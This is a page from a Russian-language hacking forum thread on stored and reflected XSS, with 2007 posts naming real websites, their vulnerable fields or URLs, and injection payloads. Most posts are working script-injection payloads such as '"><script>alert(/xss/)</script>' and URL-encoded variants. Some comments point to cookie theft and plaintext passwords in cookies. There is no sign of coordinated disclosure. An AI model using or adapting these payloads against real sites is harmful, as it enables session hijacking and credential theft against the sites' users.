ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 4 из 41 < 1 2 3 4 5 6 7 8 14 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 24.04.2007, 21:49
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
http://www.bilandima.ru бррр..противно...

Дневники>Новая Запись> Адрес фотографии >
Код:
 http://"><script>alert(/xss/)</script>
да ещё там в куках..пасс в открытом виде)
 
Ответить с цитированием

  #32  
Старый 24.04.2007, 22:15
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию
rambler.ru

В «Планете» -> «Профиль» -> «Контакты»
Уязвимо поле “ICQ 2” и название аватарки.
Куки не стыришь, тк ограничение стоит 22 символа(((

Код:
<img src=javascript:alert()>
Последний раз редактировалось freddi; 01.05.2007 в 19:52..
 
Ответить с цитированием

  #33  
Старый 25.04.2007, 06:45
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
По умолчанию
http://kemclub.ru/


При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О -
Код:
<script>alert()</script>
,

потом заходим
Код:
http://kemclub.ru/club.php?p=8&srat=1
Находим себя, получаем алерт.
 
Ответить с цитированием

  #34  
Старый 26.04.2007, 09:11
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
По умолчанию
http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )

При регистарации (
Код:
http://ismart.ee/Books.dll/login?next=index
)
уязвимы поля:
1. E-mail; - вписываем
Код:
qwe@qwe.ru"><script>alert(/xss/)</script>
2. Ваше имя. - вписаваем
Код:
<script>alert(/xss/)</script>
Далее можно изменить приветствие на
Код:
<script>alert(/xss/)</script>
, тоже работает.

Все заказы просматриваются вручную кстати

И напоследок пассивная XSS, хотя это и не так интересно :
Код:
http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
 
Ответить с цитированием

Xss на сайте ЦСКА
  #35  
Старый 27.04.2007, 22:48
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию Xss на сайте ЦСКА
Сайт http://www.cskabasket.com/


Постим коммент
Код:
<script>alert ();</script>
 
Ответить с цитированием

  #36  
Старый 28.04.2007, 16:04
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию
http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
Хек или не хек?
 
Ответить с цитированием

  #37  
Старый 30.04.2007, 12:04
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию
forum.xakep.ru

Запостил сюда тк не понял какой у них тип форума.
На форуме прицепляем файл тхт с содержанием:
"><script>alert()</script>
и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации.
на ие не тестил, он у меня глючит).
 
Ответить с цитированием

  #38  
Старый 01.05.2007, 13:56
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию
на ачате слева ссылка $$$ для web-мастеров
http://tak.ru/editing.php
в любом поле нет фильтрации : "><script>alert()</script>
 
Ответить с цитированием

  #39  
Старый 02.05.2007, 20:04
2pick
Познающий
Регистрация: 17.03.2007
Сообщений: 98
Провел на форуме:
193152

Репутация: 45
Отправить сообщение для 2pick с помощью ICQ
По умолчанию
http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=r us&title=%3Cscript%3Ealert('Here%20was%202pick');% 3C/script%3E
 
Ответить с цитированием

  #40  
Старый 02.05.2007, 21:16
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию
Цитата:
http://dyn.gismeteo.ru/cgi-bin/showmap.exe ?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3 Cscript%3Ealert('Here%20was%202pick');%3C/script%3E
это пасивная
Последний раз редактировалось _Great_; 04.06.2007 в 22:04..
 
Ответить с цитированием
Ответ
Страница 4 из 41 < 1 2 3 4 5 6 7 8 14 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ